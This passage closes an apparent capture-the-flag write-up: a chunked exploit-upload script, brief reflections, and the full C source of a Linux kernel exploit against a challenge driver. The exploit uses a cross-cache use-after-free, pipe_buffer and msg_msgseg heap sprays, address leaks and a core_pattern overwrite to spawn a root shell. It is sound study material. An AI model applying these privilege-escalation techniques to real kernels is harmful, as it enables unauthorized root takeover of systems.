        progress = f"{i//512 + 1}/{(len(payload) + 511)//512}"
        log.info(f"Uploading chunk {progress}")
        run(io, f'echo "{payload[i:i+512]}" >> b64exp')
    
    log.info("Setting up exploit...")
    run(io, 'base64 -d b64exp > exploit')
    run(io, 'rm b64exp')
    run(io, 'chmod +x exploit')
    
    log.success("Exploit uploaded!")
    io.interactive()

if __name__ == "__main__":
    main()
```

{% endcode %}

### Afterthoughts

Although I spent a really long time on this challenge, on hindsight it was a really good idea to persevere with it. I learnt a ton about the workings of the linux kernel's allocators and numerous linux kernel exploit techniques.&#x20;

### Final code

Note: There is some unused code in here, but if you followed the entire post you should be able to comprehend the code just fine! :smile:

{% code lineNumbers="true" %}

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdarg.h>
#include <stdint.h>
#include <stdio.h>
#include <sched.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/syscall.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/auxv.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <sys/mman.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <unistd.h>
#include <errno.h>
#include <pthread.h>
#include <semaphore.h>
// #include <linux/msg.h>

#define DEVICE_PATH "/dev/paradox_engine"
#define N_PAGESPRAY                0x200
// Define the size of a cred structure (adjust based on your kernel)
#define CRED_SIZE 168
// Number of children to spawn (cred spray)
#define NUM_CHILDREN 200

// Number of temporal_events to spray
#define NUM_SPRAY 200
#define FORK_SPRAY 320
#define NUM_PIPES 25
#define PIPE_BUF_SIZE 0x64
#define NUM_TASKS 50
#define CRED_JAR_INITIAL_SPRAY 200

#define CLONE_FLAGS CLONE_FILES | CLONE_FS | CLONE_VM | CLONE_SIGHAND

// ioctl commands and structures
#define PARADOX_CREATE_TIMELINE _IOWR('k', 1, struct paradox_timeline_req)
#define PARADOX_CREATE_EVENT _IOWR('k', 2, struct paradox_event_req)

#define PIPE_BUF_SPRAY1 50
#define DUMMY_PIPES 300
#define PIPE_BUF_SPRAY2 50
// original 250
#define NUM_MSGMSG 250

#define SYSCHK(x)                     \
	({                                \
		typeof(x) __res = (x);        \
		if (__res == (typeof(x))-1)   \
			err(1, "SYSCHK(" #x ")"); \
		__res;                        \
	})

struct paradox_timeline_req {
    uint64_t cause_timeline_id, cause_event_id;
    uint64_t new_timeline_id;
};

struct paradox_event_req {
    uint64_t target_timeline_id;
    uint64_t cause_event_id;
    char description[64];
    uint64_t new_event_id;
};

typedef struct {
    int thread_id;
    int num_events;
} thread_arg;

struct pipe_buffer
{
	void *page;
	unsigned int offset, len;
	void *ops;
	unsigned int flags;
	unsigned long private;
};

// https://ptr-yudai.hatenablog.com/entry/2023/12/08/093606
static inline void pin_this_thread_to_cpu(int cpu) {
    cpu_set_t set;
    CPU_ZERO(&set);
    CPU_SET(cpu, &set);
    int rc = pthread_setaffinity_np(pthread_self(), sizeof(set), &set);
    if (rc) { errno = rc; perror("pthread_setaffinity_np"); exit(1); }
}

void errExit(char * msg)
{
    printf("\033[31m\033[1m[x] Error : \033[0m%s\n",msg);
    exit(-1);
}

static void die(const char *fmt, ...) {
    va_list ap;
    va_start(ap, fmt);
    vfprintf(stderr, fmt, ap);
    va_end(ap);
    fputc('\n', stderr);
    exit(1);
}

static uint64_t dev_create_timeline(int fd, uint64_t cause_timeline_id, uint64_t cause_event_id) {
    struct paradox_timeline_req req;
    memset(&req, 0, sizeof(req));
    req.cause_timeline_id = cause_timeline_id;
    req.cause_event_id = cause_event_id;
    if (ioctl(fd, PARADOX_CREATE_TIMELINE, &req) != 0) die("ioctl CREATE_TIMELINE failed: %s", strerror(errno));
    return req.new_timeline_id;
}

static uint64_t dev_create_event(int fd, uint64_t tlid, uint64_t cause_eid, const char *desc) {
    struct paradox_event_req req;
    memset(&req, 0, sizeof(req));
    req.target_timeline_id = tlid;
    req.cause_event_id = cause_eid;
    snprintf(req.description, sizeof(req.description), "%s", desc ? desc : "e");
    if (ioctl(fd, PARADOX_CREATE_EVENT, &req) != 0) die("ioctl CREATE_EVENT failed: %s", strerror(errno));
    return req.new_event_id;
}

void send_msg(int qid, int size, int c)
{
    struct msgbuf
    {
        long mtype;
        char mtext[size - 0x30];
    } msg;

    msg.mtype = 1;
    memset(msg.mtext, c, sizeof(msg.mtext));

    if (msgsnd(qid, &msg, sizeof(msg.mtext), 0) == -1)
    {
        perror("msgsnd");
        exit(1);
    }
}


#define OBJS_PER_SLAB 36
#define CPU_PARTIAL 120
int fd1, fd2, fd3, fd4, fd5;
sem_t ready;

void *freefd2() {
    pin_this_thread_to_cpu(1);
    int cpu  = sched_getcpu(); 
    printf("[+] Closing thread running on cpu %d\n", cpu);
    close(fd2);
}

void *fillcpu1() {
    pin_this_thread_to_cpu(1);
    printf("[+] Filling cpu1 partial list...\n");
    for (int i = 0; i < OBJS_PER_SLAB * (1 + CPU_PARTIAL); i++) {
        uint64_t evt;
        if (i % 2 == 0) {
            // want to free later
            evt = dev_create_event(fd4, 0, 0, "fd4event-cpu1");
        } else {
            evt = dev_create_event(fd3, 0, 0, "fd3event-cpu1");
        }
    }
}

void *freecpu1() {
    pin_this_thread_to_cpu(1);
    printf("[+] Filling cpu1 partial list (2)...\n");
    close(fd4);
}

int pipe_fds_2[200][2];

void *spray_pipe_buf_2() {
    pin_this_thread_to_cpu(1);
    printf("[+] Spraying pipe_buffer to reclaim victim...\n");
    
    int mult = 0x1000 / 40;
    
    for (int i = 0; i < 200; i++) {
        char* buf = malloc(0x100);
        memset(buf, 'a', 0x100);
        // TODO: Implement splicing to zero the page ptr
        int res = pipe(pipe_fds_2[i]);
        if (res < 0) printf("Failed to allocate pipe buffers\n" );
        // pipe max size is 1048576 = 0x100000 = 0x1000 * 0x100
        res = fcntl(pipe_fds_2[i][1], F_SETPIPE_SZ, 0x1000 * 64);
        if (res < 0) {
            printf("fcntl %d failed!\n", i );
        }
        // res = write(pipe_fds_2[i][1], buf, 0x100);
        // if (res < 0) {
        //     printf("[x] Write!\n");
        //     return -1;
        // }
    }
    printf("[+] Spray done\n");
}

int ms_qids[NUM_MSGMSG];
void *spray_msg_msg_seg() {
    // want to reclaim an order 2 page now
    // target kmalloc-cg-1k
    pin_this_thread_to_cpu(1);
    
    for (int i = 0; i < NUM_MSGMSG; i++) {
        ms_qids[i] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
    }
    // honestly here just pray we reclaim with msg_msgseg and not msg_msg
    // can at most send 0x2000: 
    // ~ $ cat /proc/sys/kernel/msgmax
    // 8192
    struct msgbuf {
        long mtype;
        char mtext[0x1000-0x30-0x8+0x400];
    };

    struct msgbuf *msg = malloc(sizeof(struct msgbuf));
    msg->mtype = 6;
    memset(msg->mtext, 'a', sizeof(msg->mtext));

    for (int i = 0; i < NUM_MSGMSG; i++) {
        int ret = msgsnd(ms_qids[i], msg, sizeof(msg->mtext), 0);
        if (ret < 0) {
            printf("i: %d[x] msgsnd!\n", i);
            return -1;
        }
    }
}

// https://i.blackhat.com/Asia-24/Presentations/Asia-24-Wu-Game-of-Cross-Cache.pdf
// cross cache:
// objs_per_slab = 36
// cpu_partial = 120
// 0. pin to a cpu
// 1. allocate objs_per_slab * (cpu_partial + 1) objs to drain partially-free slabs [2]
// 2. allocate (objs_per_slab - 1) objects as pre-alloc objs [2]
// 3. allocate victim and UAF it [1]
// 4. allocate (objs_per_slab + 1) objects as post-alloc objects [2]
// 5. release all pre-alloc and post-alloc objects [2]
// 6. free one object per slab from step 1 (cpu_partial slabs) to trigger flushing for cpu partial list [2]
// 7. spray with msg_msg to reclaim [2]

int just_wait()
{
    sleep(1000000000);
}

void root(char *buf)
{
	int pid = strtoull(buf, 0, 10);
	char path[0x100];
	// fix stdin, stdout, stderr
	sprintf(path, "/proc/%d/ns/net", pid);
	int pfd = syscall(SYS_pidfd_open, pid, 0);
	int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0);
	int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0);
	int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0);
	dup2(stdinfd, 0);
	dup2(stdoutfd, 1);
	dup2(stderrfd, 2);
	// just cat the flag
	system("cat /flag; /bin/sh");
}

int cfd[2];
char* dummybuf = "abcd";

int main(int argc, char **argv) {
    // if it called from triggerred crash from core pattern
	if (argc > 1)
	{
		root(argv[1]);
		exit(0);
	}
    // this code is "activated" when core_pattern has been overwritten and triggers a crash
    setvbuf(stdout, 0, 2, 0);
	socketpair(AF_UNIX, SOCK_STREAM, 0, cfd);
	if (fork() == 0)
	{
		int memfd = memfd_create("x", 0);
		SYSCHK(sendfile(memfd, open("/proc/self/exe", 0), 0,
						0xffffffff));
		dup2(memfd, 666);
		close(memfd);
		// wait signal of the finished exploit
		read(cfd[0], dummybuf, 1);
		// trigger crash
		*(size_t *)0 = 0;
	}

    pin_this_thread_to_cpu(0);
    fd1 = open(DEVICE_PATH, O_RDONLY); // for cpu0 pre-alloc obj, post-alloc obj and the partial page objs to be freed
    fd2 = open(DEVICE_PATH, O_RDONLY); // uncontrollable infinite loop
    fd3 = open(DEVICE_PATH, O_RDONLY); // fd3 is never closed
    fd4 = open(DEVICE_PATH, O_RDONLY); // for filling cpu1 partial list
    fd5 = open(DEVICE_PATH, O_RDONLY); // for filling cpu1 partial list
    // getchar();
    if (fd1 < 0 || fd2 < 0) die("open /dev/paradox_engine");
    printf("[+] devices opened\n");
    printf("[+] creating events...\n");
    // drain partially-free slabs
    
    // for (int i = 0; i < 34; i++) {
    //     uint64_t evt;
    //     evt = dev_create_event(fd2, 1, 0, "fd2event-pre");
    //     if (evt < 0) printf("[x] evt!");
    // }
    // uint64_t togotocpu0[CPU_PARTIAL * 2];
    // for (int i = 0; i < CPU_PARTIAL * 2; i++) {
    //     uint64_t evt;
    //     evt = dev_create_event(fd1, 0, 0, "to_go_into_cpu0");
    //     if (evt < 0) printf("[x] evt!");
    //     togotocpu0[i] = evt;
    // }

    uint64_t partiallyfrees[CPU_PARTIAL + 1];
    for (int i = 0; i < OBJS_PER_SLAB * (1 + CPU_PARTIAL); i++) {
        uint64_t evt;
        if (i % 2 == 0) {
            // want to free later
            evt = dev_create_event(fd1, 0, 0, "fd1event-cpu0");
            partiallyfrees[i / OBJS_PER_SLAB] = evt;
        } else {
            evt = dev_create_event(fd3, 0, 0, "fd3event-cpu0");
        }
        if (evt < 0) printf("[x] evt!");
    }

    pthread_t t1;
    pthread_create(&t1, NULL, fillcpu1, NULL);
    pthread_join(t1, NULL);
    printf("[+] Creating timelines with dependencies on partially freed slab objects\n");

    for (int i = 0; i < (CPU_PARTIAL + 1); i++) {
        uint64_t tl = dev_create_timeline(fd1, 0, partiallyfrees[i]);
        if (tl < 0) printf("[x] tl!");
    }
    
    uint64_t preallocs[OBJS_PER_SLAB - 1];
    printf("[+] Creating pre-alloc objects\n");
    for (int i = 0; i < OBJS_PER_SLAB - 1; i++) {
        // pre-alloc objects
        uint64_t evt;
        if (i % 2) {
            evt = dev_create_event(fd1, 0, 0, "pre-alloc object");
        } else {
            evt = dev_create_event(fd5, 0, 0, "pre-alloc object");
        }
        if (evt < 0) printf("[x] evt!");
        preallocs[i] = evt;
    }

    printf("[+] creating self-referential event...\n");
    uint64_t e0 = dev_create_event(fd2, 0, 1, "self-referring event");
    printf("[+] self-ref event created: e0=%llu\n", e0);
    
    printf("[+] Creating post-alloc objects\n");
    uint64_t postallocs[OBJS_PER_SLAB + 1];

    for (int i = 0; i < OBJS_PER_SLAB + 1; i++) {
        uint64_t evt;
        if (i % 2) {
            evt = dev_create_event(fd1, 0, 0, "post-alloc object");
        } else {
            evt = dev_create_event(fd5, 0, 0, "post-alloc object");
        }
        if (evt < 0) printf("[x] evt!");
        postallocs[i] = evt;
    }

    close(fd5);
    // pause();
    pthread_t t2;
    pthread_create(&t2, NULL, freecpu1, NULL);
    pthread_join(t2, NULL);
    printf("[+] Freeing self-referential event...\n");
    pthread_t t;
    pthread_create(&t, NULL, freefd2, NULL);
    // sleep(5); // bro...
    // block until the other thread enters
    sleep(1);
    printf("[+] Releasing pre-alloc and post-alloc objects and one obj per partially freed slab\n");
    close(fd1);
    
    int cpu  = sched_getcpu(); 
    printf("[+] Main thread running on cpu %d\n", cpu);
    printf("[+] About to spray...\n");
    // getchar();
    printf("[+] Spraying pipe buffer...\n");
    int pipe_fds[NUM_PIPES][2];
    int ret = 0;
    int found = 0;
    size_t cursize = 0x10;
    int changed_pipe = -1;
    // getchar();
    for (int i = 0; i < (0x1000 / 0x10); i++) {
        // printf("i: %d\n", i);
        char* buf = malloc(cursize);
        memset(buf, '\x00', cursize);
        for (int j2 = 0; j2 + 8 < cursize; j2 += 0x10) {
            buf[j2 + 8] = '\x01';
        }
        // create pipes and write contents
        for (int j = 0; j < NUM_PIPES; j++) {
            // printf("j: %d\n", j);
            int res = pipe(pipe_fds[j]);
            if (res < 0) printf("Failed to allocate pipe buffers\n" );
            ret = write(pipe_fds[j][1], buf, cursize);
            if (ret < 0) {
                printf("[x] Write!\n");
                return -1;
            }
        }
        // check if any pipes had content changed
        for (int j = 0; j < NUM_PIPES; j++) {
            // printf("j2: %d\n", j);
            char* recvbuf = malloc(cursize);
            usleep(10); // transfer control to other thread
            ret = read(pipe_fds[j][0], recvbuf, cursize);
            if (ret < 0) {
                printf("[x] Read!\n");
                return -1;
            }
            if (memcmp(recvbuf, buf, cursize) != 0) {
                printf("We got lucky! Pipe %d had content changed!\n", j);
                changed_pipe = j;
                printf("Expected: ");
                for (int k = cursize - 0x8; k < cursize; k++) {
                    printf("%02x ", (unsigned char)buf[k]);
                }
                printf("\nGot:      ");
                for (int k = cursize - 0x8; k < cursize; k++) {
                    printf("%02x ", (unsigned char)recvbuf[k]);
                }
                printf("\n");
                found = 1;
                break;
            }
        }
        if (found) {
            break;
        }
        // close all pipes
        for (int j = 0; j < NUM_PIPES; j++) {
            close(pipe_fds[j][1]);
            close(pipe_fds[j][0]);
        }
        cursize += 0x10;
    }
    if (found == -1) {
        printf("Victim pipe not found!\n");
        return -1;
    }
    /* 
    now we know the object's offset in the page, i.e. 0x...??0

      Now we overwrite the refcount with 1 and partially overwrite the pointer for a
      page kfree
    */
    printf("[+] Pre-stage 1\n");
    // getchar();
    printf("[+] Stage 1: Spraying pipe_buffer to claim order 10 page...\n");
    // getchar();
    int pfds[PIPE_BUF_SPRAY1][2];
    char* filler1 = malloc(0x1000);
    memset(filler1, 'A', 0x1000);
    int res;
    // stage 1: reclaiming order 10 pages using enlarged pipe_buffer structs
    for (int i = 0; i < PIPE_BUF_SPRAY1; i++) {
        res = pipe(pfds[i]);
        if (res < 0) {
            printf("Failed to allocate pipe buffers\n" );
            return -1;
        }
        // enlarge
        // we can spray at most around 60 of these before we get cooked
        res = fcntl(pfds[i][1], F_SETPIPE_SZ, 0x1000 * 0x100);
        if (res < 0) {
            printf("fcntl %d failed!\n", i );
            return -1;
        }
        // write into bufs[0]
        res = write(pfds[i][1], filler1, 1);
        if (res < 0) {
            printf("write failed!\n" );
            return -1;
        }
    }
    for (int i = 0; i < PIPE_BUF_SPRAY1; i++) {
        // set the first pipe_buf's op field to NULL
        // at the same time, set its pipe_buffer->offset = temporal_event->refcount = 1 :)
        read(pfds[i][0], filler1, 1);
    }
    printf("[+] Stage 1 done!\n");
    // stage 2 may crash if we were unlucky in step 1
    printf("[+] Stage 2: Using partial overwrite to free page...\n");
    // need to spray enough to push the victim pipe into free_area instead of cpu1 ?
    int dummy_pipes[DUMMY_PIPES][2];
    for (int i = 0; i < DUMMY_PIPES; i++) {
        int res = pipe(dummy_pipes[i]);
        if (res < 0) {
            printf("Failed to create pipe %d\n", i);
            break;
        }
    }
    for (int i = 0; i < DUMMY_PIPES; i++) {
        res = write(dummy_pipes[i][1], "a", 1);
        if (res < 0) {
            printf("Failed to write to pipe %d\n", i);
            break;
        }
        close(dummy_pipes[i][1]);
        close(dummy_pipes[i][0]);
    }
    close(pipe_fds[changed_pipe][1]);
    close(pipe_fds[changed_pipe][0]);
    usleep(1000);
    // getchar();
    char* buf = malloc(cursize + 3);
    memset(buf, '\x00', cursize + 3);
    buf[cursize - 0x8] = '\x01'; // refcount
    // buf[cursize + 2] = '\xa0';
    buf[cursize + 2] = '\x60';
    
    int stage_2_pipes[PIPE_BUF_SPRAY2][2];
    for (int i = 0; i < PIPE_BUF_SPRAY2; i++) {
        // printf("i: %d\n", i);
        int res = pipe(stage_2_pipes[i]);
        if (res < 0) {
            printf("Failed to allocate pipe buffers %d\n", i);
            break;
        } 
        ret = write(stage_2_pipes[i][1], buf, cursize + 3);
        if (ret < 0) {
            printf("[x] Write!\n");
            break;
        }
    }
    printf("[+] Stage 2 done!\n");
    getchar();
    printf("[+] Stage 3: Spraying msg_msgseg to reclaim page in cpu 1... (if this step hangs just re-run)\n");
    pthread_t t3;
    pthread_create(&t3, NULL, spray_msg_msg_seg, NULL);
    pthread_join(t3, NULL);
    printf("[+] Stage 3 done!\n");
    printf("[+] Stage 4: Initializing pipe_buffer to prepare for leaks...\n");
    // get vDSO addr
	size_t *vvar = ((size_t *)getauxval(AT_SYSINFO_EHDR));
	struct iovec iov = {vvar, 1};
    for (int i = 0; i < PIPE_BUF_SPRAY1; i++) {
        // res = write(pfds[i][1], filler1, 1);
        // if (res < 0) {
        //     printf("write failed!\n" );
        //     return -1;
        // }
        // vmsplice trick
        SYSCHK(vmsplice(pfds[i][1], &iov, 1, 0));
    }
    printf("[+] Stage 4 done!\n");
    // getchar();
    printf("[+] Stage 5: Leaking heap addresses using msg_msgseg and pipe_buffer overlap...\n");
    int victim_msqid = -1;
    struct leakmsgbuf {
        long mtype;
        char mtext[0x1000-0x30-0x8+0x400];
    };
    struct leakmsgbuf *leakmsg = malloc(sizeof(struct leakmsgbuf));
    leakmsg->mtype = 6;
    memset(leakmsg, 0, sizeof(struct leakmsgbuf));
    char* correct_buf = malloc(0x1000-0x30-0x8+0x400);
    memset(correct_buf, 'a', 0x1000-0x30-0x8+0x400);
    struct pipe_buffer *p;
    for (int i = 0; i < NUM_MSGMSG; i++) {
        // read msg without freeing memory
        ret = msgrcv(ms_qids[i], leakmsg, 0x1000-0x30-0x8+0x400, 0, IPC_NOWAIT | MSG_COPY);
        if (ret < 0) {
            perror("msgrcv"); 
            continue;
        }
        if (memcmp(leakmsg->mtext, correct_buf, 0x1000-0x30-0x8+0x400) != 0) {
            msgrcv(ms_qids[i], leakmsg, 0x1000-0x30-0x8+0x400, 6, 0);
            victim_msqid = ms_qids[i];
            printf("[+] Victim found! msqid: %d\n", victim_msqid);
            // print victim data
            for (int i = 0x1000-0x30-0x8+0x28; i < 0x1000-0x30-0x8+0x40; i++) {
                printf("%02x ", leakmsg->mtext[i]);
            }
            printf("\n");
            p = (void *)&leakmsg->mtext[0x1000 - 0x30 - 0x8 + 0x28];
            break;
        }
    }
    /*
    no kaslr leaks : 
    - page leak: 0xffffea00000cf400
    - pipe_buf_ops leak: 0xffffffff82c6fe80

    kernel text:   0xffffffff81000000-0xffffffff82800000 (0x1800000 bytes)
    kernel rodata: 0xffffffff82800000-0xffffffff83497000 (0xc97000 bytes)
    kernel data:   0xffffffff83600000-0xffffffff8419d000 (0xb9d000 bytes)

        struct pipe_buffer {
            void *page;
            unsigned int offset, len;
            void *ops;
            unsigned int flags;
            unsigned long private;
        };
    */
    if (victim_msqid == -1) {
        printf("Victim msqid not found!\n");
        return -1;
    }
    void *page_leak;
    memcpy(&page_leak, (leakmsg->mtext) + 0x1000 - 0x30 - 0x8 + 0x28, sizeof(void *));
    void *pipe_buf_ops_leak;
    memcpy(&pipe_buf_ops_leak, (leakmsg->mtext) + 0x1000 - 0x30 - 0x8 + 0x38, sizeof(void *));
    printf("page leak: %p\n", page_leak);
    printf("pipe_buf_ops leak: %p\n", pipe_buf_ops_leak);
    printf("[+] Stage 5 done!\n");
    getchar();
    printf("[+] Stage 6: Overwriting pipe_buffer->page to point to core_pattern's page...\n");
    // modify struct page that will represent of `core_pattern`'s page
    // p->page was originally pointing vdso_image_64.data.
    // gef> p (void*)vdso_image_64
    // $2 = (void *) 0xffffffff833d0000 <- vdso_image_64.data
    // gef> p &core_pattern
    // $1 = (<data variable, no debug info> *) 0xffffffff83808a60
    // gef> p 0xffffffff83808a60-0xffffffff833d0000
    // $3 = 0x438a60
    // the difference between the address of the pages of vdso_image_64.data and core_pattern is 0x438000
    // every 4096 byte page, there is a 64 byte struct page* stored in vmemmap, 
    // so to calculate the difference between struct page* addresses, you have to do: 0x438000 / 4096 * 64 which equals to 0x863000 >> 6
    // (right shift by 12 bits and left shift by 6 bits)
    p->page += (0x438000 >> 6);
    // Since p->len == 1, we need to subtract one on p->offset
    p->offset = 0xa60 - 1;
    p->flags = 0x10; // PIPE_BUF_FLAG_CAN_MERGE, apply every pipe write to the page
    leakmsg->mtype = 7;
    // overwrite the pipe_buffer with msg_msg_seg (with our own modified pipe_buffer content)
    int payload_msqids[0x100];
    for (int i = 0; i < 0x100; i++) {
        payload_msqids[i] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
    }
    for (int i = 0; i < 0x100; i++) {
        ret = msgsnd(payload_msqids[i], leakmsg, 0x1000-0x30-0x8+0x400, 0);
        if (ret < 0) {
            printf("[x] msgsnd %d!\n", i);
            return -1;
        }
    }
    printf("[+] Stage 6 done!\n");
    printf("[+] Stage 7: Overwriting core_pattern by writing into pipe_buffer...\n");
    for (int i = 0; i < PIPE_BUF_SPRAY1; i++) {
        dprintf(pfds[i][1], "%s", "|/proc/%P/fd/666 %P\n");
    }
    printf("[+] Stage 7 done!\n");
    // show content of core_pattern
	system("cat /proc/sys/kernel/core_pattern");
	// trigger root shell
    // getchar();
    
    write(cfd[1], dummybuf, 1);
    while (1) {
        sleep(100);
    }

    return 0;
}   

```

{% endcode %}
